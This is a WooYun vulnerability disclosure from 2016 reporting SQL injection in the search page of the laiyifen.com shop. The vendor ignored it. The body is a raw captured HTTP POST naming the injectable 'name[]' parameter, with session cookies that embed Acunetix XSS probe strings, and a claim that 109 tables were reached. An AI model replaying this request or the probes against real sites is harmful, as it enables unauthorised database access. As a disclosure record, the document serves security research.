当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171180

漏洞标题:来伊份主站存在SQL注入漏洞

相关厂商:上海来伊份股份有限公司

漏洞作者: 路人甲

提交时间:2016-01-19 22:55

修复时间:2016-01-24 23:00

公开时间:2016-01-24 23:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-19: 细节已通知厂商并且等待厂商处理中
2016-01-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /index.php/search-result.html HTTP/1.1
Content-Length: 145
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.laiyifen.com
Cookie: vary=764a8c3493713cbe95be8153d86363a91a94ee60638487365167a950e7783a9a; laiyifen_cookie=536871690.20480.0000; s=6316d5be99b30d7b1a6e3305d786d23d; S[CART_COUNT]=25; S[CART_NUMBER]=58; S[CART_TOTAL_PRICE]=%EF%BF%A5838.58; cart[go_back_link]=http%3A%2F%2Fwww.laiyifen.com%2F; ZDEDebuggerPresent=php,phtml,php3; MEMBER=-d41d8cd98f00b204e9800998ecf8427e-d41d8cd98f00b204e9800998ecf8427e-1453039977; _ga=GA1.2.1979350516.1453040025; _gat=1; __utmt=1; __utma=9760808.1095288434.1453040024.1453040029.1453040029.1; __utmb=9760808.1.10.1453040029; __utmc=9760808; __utmz=9760808.1453040029.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); S[FIRST_REFER]=%7B%22ID%22%3A%22%22%2C%22REFER%22%3A%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%2C%22DATE%22%3A1452857408000%7D; S[NOW_REFER]=%7B%22ID%22%3A%22%22%2C%22REFER%22%3A%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%2C%22DATE%22%3A1453039936000%7D; S[N]=7D798C97-3050-197C-394B-C4B06436E9AD; S[GCOMPARE]=; acta=%7B%22actn%22%3A%7B%22500223%22%3A%5B%226720858557168088475%3E1%3E1453040166949%3E1%3E1453040166949%3E6720858557168087450%3E1453040166949%22%2C1468592161934%5D%7D%2C%22acti%22%3A%7B%22500223%22%3A%5B%22145304016178114455%22%2C1468592161781%5D%7D%2C%22acts%22%3A%7B%22500223%22%3A%5B%224%3Eacunetix-referrer.com%22%2C1468592161934%5D%7D%2C%22actmapping%22%3A%7B%220%22%3A%5B1%2C1455632654311%5D%7D%7D; c23=%5B%7B%22goods_id%22%3A%2223%22%2C%22name%22%3A%22%E5%B0%8F%E6%A0%B8%E6%A1%83%E4%BB%81128g%22%2C%22price%22%3A%2251.200%22%2C%22num%22%3A85%2C%22img%22%3A%22http%3A%2F%2Fimages4.laiyifen.com%2Flaiyifen%2F2011%2F10054%2F10054_01_s.jpg%3Fv%3D1.0%3F1322305619%23h%22%7D%5D; goods_key=767%2C; p23=%5B%7B'goods_id'%3A'23'%2C'product_id'%3A'38'%7D%5D; HMACCOUNT=08336620CE0151DA; Hm_lvt_39275d51dc9886fb63632959ca583081=1453040474,1453040508; Hm_lpvt_39275d51dc9886fb63632959ca583081=1453040508; Hm_lvt_0642ec06b0edd997389083e09f2399fb=1453040484,1453040508; Hm_lpvt_0642ec06b0edd997389083e09f2399fb=1453040508; 53kf_72081366_keyword=http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22); kf_72081366_keyword_ok=1; 53gid2=10014150889011; 53gid0=10014150889011; 53gid1=10014150889011; visitor_type=old; 53uvid=1; onliner_zdfq72081366=0; guest_id=10014150889011; land_page_72081366=http%3A%2F%2Fwww.laiyifen.com%2Findex.php%2Fproduct-658.html; 124114079226=%E9%99%95%E8%A5%BF%E7%9C%81%E8%A5%BF%E5%AE%89%E5%B8%82%2C%E7%94%B5%E4%BF%A1%2C%E8%A5%BF%E5%AE%89%E5%B8%82; customer_service_language=cn; unique_ip_72081366=124.114.79.226; unique_ip_revisit72081366=1453040533; SESSION_COOKIE=mastertb_1; c767=%5B%7B'goods_id'%3A'767'%2C'name'%3A'%E7%B3%99%E7%B1%B3%E5%8D%B7%EF%BC%88%E8%9B%8B%E9%BB%84%E5%91%B3%EF%BC%89'%2C'price'%3A'9.800'%2C'num'%3A'1'%2C'img'%3A'http%3A%2F%2Fimages1.laiyifen.com%2Flaiyifen%2F2013%2F11441%2F11441_01_s.jpg%3Fv%3D1.0%3F1375432174%23h'%7D%5D
Host: www.laiyifen.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
name%5b%5d=%e6%89%be%e5%af%bb%e6%82%a8%e9%92%9f%e7%88%b1%e7%9a%84%e6%9d%a5%e4%bc%8a%e4%bb%bd%e9%9b%b6%e9%a3%9f

4.png

5.png

109个表,具体数据不深入~

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-24 23:00

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价